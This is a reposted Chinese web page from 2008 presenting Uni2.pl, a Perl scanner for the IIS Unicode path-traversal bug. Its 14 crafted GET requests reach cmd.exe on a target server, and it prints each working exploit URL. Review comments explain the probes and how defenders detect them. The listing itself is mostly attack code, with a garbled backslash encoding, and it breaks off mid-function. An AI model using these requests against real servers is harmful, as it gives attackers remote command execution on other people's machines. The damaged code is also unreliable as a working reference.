
IIS UNICODE Bug

来源：互联网 作者：west263.com 时间：2008-04-16

2、比较全面的UNICODE工具Uni2.pl
　　只要支持PERL，就能够利用这工具来对目标主机进行UNICODE编码漏洞的扫描。该程式能够对任何存在UNICODE编码漏洞的NT版本进行扫描测试。以下为该软件的源程式，具体如何操作就不做周详解说了
#!/usr/bin/perl
#
# Uni2.pl checks a host for the recent IIS unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Origionally Stealthmode316, modifications by Roeland
#
#
use Socket;
# --------------init
# Main script: takes one host name on the command line and issues 14 HTTP
# GET requests against it, each spelling the ".." path traversal with a
# different (overlong / invalid) byte or percent sequence so that an IIS
# server that decodes the path after checking it reaches
# /winnt/system32/cmd.exe?/c dir.  Any response line containing the word
# "Directory" is taken as confirmation and the matching URL is printed.
#
# From a defender's point of view every probe is the same signal: a request
# for /winnt/system32/cmd.exe underneath /scripts/ or /msadc/ whose path
# carries non-ASCII bytes or malformed %xx escapes.  Web-server access logs
# and any request-path normaliser in front of the server see all 14 variants
# unchanged, so the scan is easy to spot and to block at the edge.
#
# NOTE(review): the listing as reproduced on this page is encoding-damaged.
# The sequence "£Ü" appears wherever the original had a backslash, so
# "£Ün" / "£Ür" stand for "\n" / "\r"; as written they are literal
# characters, not line endings, and the script does not run unmodified.
#
# Usage check: exactly one argument is expected.  The usage text suggests
# "host:port", but the split that would honour ":port" is commented out
# below, so the port part is never parsed.
if ($#ARGV<0) {die "UNICODE-CHECK
Example: ./uni.pl www.target.com:80£Ün";}
#($host,$port)=split(/:/,@ARGV[0]);
# "@ARGV[0]" is a one-element array slice, not the scalar "$ARGV[0]"; it
# works here because the slice collapses to its single element, but
# "use warnings" (not enabled in this script) would flag it.
($host = @ARGV[0]);
# Port is hard-wired to 80 regardless of what the user typed after ":".
$port = 80;
# Packed IPv4 address of the host; inet_aton's undef-on-failure result is
# not checked here, the later name lookup in sendraw reports unknown hosts.
$target = inet_aton($host);
# Set to 1 by any probe whose response mentions "Directory".
$flag=0;
# ---------------test method 1
# Probes 1-13 differ only in how the traversal after "/scripts/.." is
# encoded (raw high bytes or %xx escapes); each request is HTTP/1.0 with no
# Host header and no other headers.  "my @results" is re-declared at file
# scope for every probe, which "use warnings" would also report as masking
# the earlier declaration; the unanchored /Directory/ test matches anywhere
# in the raw response, header or body.
my @results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..À¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 2
my @results=sendraw("GET /scripts..Áœ../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts..Áœ../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 3
my @results=sendraw("GET /scripts/..Á%pc../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á%pc../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 4
my @results=sendraw("GET /scripts/..À%9v../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..À%9v../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 5
my @results=sendraw("GET /scripts/..À%qf../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..À%qf../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 6
my @results=sendraw("GET /scripts/..Á%8s../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á%8s../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 7
my @results=sendraw("GET /scripts/..Á../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 8
my @results=sendraw("GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Áœ../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 9
my @results=sendraw("GET /scripts/..Á¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 10
my @results=sendraw("GET /scripts/..à€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..à€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 11
my @results=sendraw("GET /scripts/..ð€€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..ð€€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 12
my @results=sendraw("GET /scripts/..ø€€€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..ø€€€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 13
my @results=sendraw("GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 14
# Probe 14 targets /msadc/ instead of /scripts/ and climbs three levels; the
# traversal bytes are written as backslash escapes in the Perl string (the
# "£Ü" here is the same mangled backslash noted above), and the "?" and the
# space before "dir" are backslash-escaped as well.  The string literal also
# spans a line break, which is part of the request as written.
my @results=sendraw("GET /msadc/..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../winnt/system32/cmd.exe£Ü?/c£Ü dir HTTP/1.0£Ür£Ün£Ür£Ün
");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../winnt/system32/cmd.exe£Ü?/c£Ü dir£Ün";}}
# No probe matched: report and stop.  The script exits with status 0 in
# both outcomes, so callers cannot distinguish the result by exit code.
if ($flag!=1) {
print "$host: Not vulnerable£Ün";
exit;
}
sub sendraw {
$hbn = gethostbyname($host);
if ($hbn) {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,gethostbyname('tcp')||0) || die("Socket problems£Ün");
if(connect(S,pack "SnA4x8",2,$port,$target)) {
my @in;
select(S);
$|=1;
print $pstr;
while(){
push @in, $_;
}
select(STDOUT);
close(S);
return @in;
} else {
print "$host: Can't connect£Ün";
exit;
}
} else {
print "$host: Host not found£Ün";
